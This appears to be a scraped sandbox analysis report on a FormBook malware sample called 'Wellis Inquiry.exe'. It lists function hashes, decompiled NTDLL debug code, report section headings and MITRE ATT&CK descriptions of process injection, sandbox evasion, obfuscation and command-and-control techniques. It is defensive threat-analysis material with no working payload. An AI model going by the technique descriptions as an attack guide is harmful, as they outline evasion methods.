Function 02D2D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,02D27C83,?), ref: 02D2D45B

Memory Dump Source

Source File: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Offset: 02D20000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: 71803b5fef83ccde17b2ca89801b856e043cf6c914093dad594799a39d7dbc84
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: FED05E617503042AE610AAA49C02F2632C99B55A44F494064FA48A63C3DA54E8018561

Uniqueness

Uniqueness Score: -1.00%

Function 0471967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04719694

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a548b4f307e6b505f86cda86c82319f02a0821b818f33ba04b5fe39b25e9a084
Instruction ID: 41d19ef64fdedcf2af09ca728783f339df22440a535d1c6443f407a5d6e6bdb5
Opcode Fuzzy Hash: a548b4f307e6b505f86cda86c82319f02a0821b818f33ba04b5fe39b25e9a084
Instruction Fuzzy Hash: 05B09BF19015D5C9F711D7644708717790077D4755F26C061D3020651A4778D0D5F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0476FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0476FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0471CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04765720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04765720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0476fdda
0x0476fde2
0x0476fde5
0x0476fdec
0x0476fdfa
0x0476fdff
0x0476fe0a
0x0476fe0f
0x0476fe17
0x0476fe1e
0x0476fe19
0x0476fe19
0x0476fe19
0x0476fe20
0x0476fe21
0x0476fe22
0x0476fe25
0x0476fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0476FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0476FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0476FE01

Memory Dump Source

Source File: 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true

Associated: 0000000B.00000002.922922493.00000000047CB000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.922933670.00000000047CF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 02306ae802172da44e334bc7b3b3e9e24568ef74a7aa8e3fb95e48371e1ae497
Instruction ID: 829f2375ce643e3557a2ce5482c4d3b73a94e50a12d5de4d0fdec0c6a6319613
Opcode Fuzzy Hash: 02306ae802172da44e334bc7b3b3e9e24568ef74a7aa8e3fb95e48371e1ae497
Instruction Fuzzy Hash: A6F0F672640601BFE7211A55EC0AF33BF5BEB44730F140358FA28566E1EA62F83096F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Wellis Inquiry.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Function 0041868A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37
filenativeCOMMON

Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004185DA, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 0041870A, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON